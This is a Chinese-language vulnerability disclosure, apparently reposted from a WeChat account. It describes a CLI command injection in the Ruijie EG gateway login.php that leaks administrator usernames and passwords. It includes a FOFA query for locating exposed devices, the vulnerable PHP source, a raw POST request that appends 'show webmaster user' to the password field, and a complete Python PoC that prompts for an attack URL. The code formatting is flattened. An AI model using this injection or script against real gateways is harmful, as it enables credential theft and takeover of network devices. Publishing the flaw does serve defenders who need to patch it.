漏洞描述
锐捷EG易网关 login.php存在 CLI命令注入,导致管理员账号密码泄露漏洞
漏洞影响
锐捷EG易网关FOFA
app="Ruijie-EG易网关"漏洞复现
登录页面如下
漏洞文件 login.php
<?php/*** 用户登录处理*/define('IN', true); //定位该文件是入口文件define('DS', DIRECTORY_SEPARATOR);define('AROOT', dirname(__FILE__) . DS);class defaultController {function __construct() {}/*** 登录处理*/public function indexAction() {$username = p("username");$password = p("password");$data = [];$reg='/(r|n)+/';if (count(preg_split($reg, $username)) > 1 || count(preg_split($reg, $password)) > 1) {$data["status"] = 6;$data["msg"] = "username or password can't exist 'rn'";json_echo($data);exit();}if ($username == FALSE || $password == FALSE) {$data["status"] = 5;$data["msg"] = "username or password can't empty";json_echo($data);exit();}$res = execCli("exec", "webmaster $username $password");if ($res["status"] != 1) {json_echo($res);exit();}$isSuccess = trim($res["data"]);if ($isSuccess == 0) { //用户名、账号验证成功session_start();$_SESSION['username'] = $username; //记录用户名$_SESSION["lasttime"] = time(); //记录登录时间$config = @file_get_contents(DS . "data" . DS . "web.config"); //获取web配置信息if ($config != false) {$config = unserialize($config);$_SESSION["timeout"] = isset($config["loginTimeout"]) ? $config["loginTimeout"] * 60 : c("timeout");} else {$_SESSION["timeout"] = c("timeout");}setcookie("user", $_SESSION['username']);}$res["data"] = $isSuccess;json_echo($res);}/*** 获取设备信息*/function versionAction() {$info = $version = execCli("exec", "show version detail", "");$info["data"] = preg_split("/r*n/", $info["data"]);json_echo($info);}}include_once(AROOT . "init.php"); //mvc初始化入口,放在底部
关键代码部分
if ($username == FALSE || $password == FALSE) {$data["status"] = 5;$data["msg"] = "username or password can't empty";json_echo($data);exit();}$res = execCli("exec", "webmaster $username $password");if ($res["status"] != 1) {json_echo($res);exit();}$isSuccess = trim($res["data"]);
发送请求包,拼接 CLI指令show webmaster user
POST /login.php HTTP/1.1Host:User-Agent: Go-http-client/1.1Content-Length: 49Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestAccept-Encoding: gzipusername=admin&password=admin?show+webmaster+user
成功获取账号密码
漏洞POC
#!/usr/bin/python3#-*- coding:utf-8 -*-# author : PeiQi# from : http://wiki.peiqi.techimport base64import requestsimport randomimport reimport jsonimport sysdef title():print('+------------------------------------------')print('+ �33[34mPOC_Des: http://wiki.peiqi.tech �33[0m')print('+ �33[34mGithub : https://github.com/PeiQi0 �33[0m')print('+ �33[34m公众号 : PeiQi文库 �33[0m')print('+ �33[34mVersion: 锐捷EG网关 管理员账号密码泄露 �33[0m')print('+ �33[36m使用格式: python3 poc.py �33[0m')print('+ �33[36mUrl >>> http://xxx.xxx.xxx.xxx �33[0m')print('+------------------------------------------')def POC_1(target_url):vuln_url = target_url + "/login.php"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36","Content-Type": "application/x-www-form-urlencoded"}data = 'username=admin&password=admin?show+webmaster+user'try:response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10)print("�33[36m[o] 正在执行 show webmaster user �33[0m".format(target_url))if "data" in response.text and response.status_code == 200:print("�33[36m[o] 成功获取, 响应为:{} �33[0m".format(response.text))except Exception as e:print("�33[31m[x] 请求失败:{} �33[0m".format(e))sys.exit(0)#if __name__ == '__main__':title()target_url = str(input("�33[35mPlease input Attack UrlnUrl >>> �33[0m"))POC_1(target_url)
参考链接
http://wiki.peiqi.tech
原文始发于微信公众号(无问之路):锐捷 EG易网关管理员账号密码泄露漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论